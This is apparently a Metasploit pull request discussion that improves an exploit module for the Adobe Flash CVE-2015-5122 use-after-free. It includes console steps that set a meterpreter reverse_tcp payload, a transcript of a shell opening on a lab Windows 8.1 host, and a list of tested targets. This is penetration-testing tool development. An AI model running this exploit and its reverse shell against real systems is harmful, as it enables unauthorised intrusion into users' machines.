Improve Adobe Flash CVE-2015-5122, add Windows 8.1 (32bits) / IE11 support

[jvazquez-r7]

This PR modifies adobe_flash_opaque_background_uaf to:

• Improve exploit reliability
• Add support for Windows 8.1 (32bits) / IE11 / Flash 18

Verification

• Install a target: Windows 8.1 (32 bits) / IE11 and Flash 18. I've used Flash 18.0.0.194 from an snapshot I had saved.
• Run the module, visit the URl with the target and verify which you get a session:

msf exploit(adobe_flash_opaque_background_uaf) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(adobe_flash_opaque_background_uaf) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_opaque_background_uaf) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(adobe_flash_opaque_background_uaf) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

msf exploit(adobe_flash_opaque_background_uaf) >
[*] 172.16.158.135   adobe_flash_opaque_background_uaf - Gathering target information.
[*] 172.16.158.135   adobe_flash_opaque_background_uaf - Sending HTML response.
[*] 172.16.158.135   adobe_flash_opaque_background_uaf - Request: /Q4GlnHBj3Q/EbdyPr/
[*] 172.16.158.135   adobe_flash_opaque_background_uaf - Sending HTML...
[*] 172.16.158.135   adobe_flash_opaque_background_uaf - Request: /Q4GlnHBj3Q/EbdyPr/dEXU.swf
[*] 172.16.158.135   adobe_flash_opaque_background_uaf - Sending SWF...
[*] Sending stage (885806 bytes) to 172.16.158.135
[*] Meterpreter session 3 opened (172.16.158.1:4444 -> 172.16.158.135:49874) at 2015-07-16 14:53:15 -0500

msf exploit(adobe_flash_opaque_background_uaf) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: WIN-U7MBH836GNO\juan
meterpreter > getpid
Current pid: 3152
meterpreter > ps -S 3152


Process list
============

 PID   Name              Arch  Session  User                  Path
 ---   ----              ----  -------  ----                  ----
 3152  iexplore.exe      x86   1        WIN-U7MBH836GNO\juan  C:\Program Files\Internet Explorer\iexplore.exe


meterpreter > sysinfo
Computer        : WIN-U7MBH836GNO
OS              : Windows 8.1 (Build 9600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

[wchen-r7]

@jvazquez-r7 :

Successfully tested on:

• Windows 7 SP1 + IE9 + Flash 18.0.0.203
• Windows 7 SP1 + Firefox 39.0 + Flash 18.0.0.203
• Windows 7 SP1 + IE11 + Flash 18.0.0.203
• Windows 7 SP1 + IE11 + Flash 18.0.0.194
• Windows 7 SP1 + Firefox 39.0 + Flash 18.0.0.194
• Windows 7 SP1 + IE 9 + Flash 18.0.0.194
• Windows 8.1 + Firefox 39.0 + Flash 18.0.0.160
• Windows 8.1 + Firefox 39.0 + Flash 18.0.0.203
• Windows 8.1 + IE 11 + Flash 18.0.0.194
• Windows XP SP3 + IE8 + Flash 18.0.0.194
• Windows XP SP3 + IE 8 + Flash 18.0.0.203
• Windows XP SP3 + Firefox + Flash 18.0.0.203
• Windows Vista SP2 + IE 9 + Flash 18.0.0.203
• Windows Vista SP2 + Firefox 39.0 + Flash 18.0.0.203
• BAP2 vs Windows 8.1 + IE 11 + Flash 18.0.0.194

I'll open up the requirements to those targets (XP and Vista). Can I bump the Rank to Great?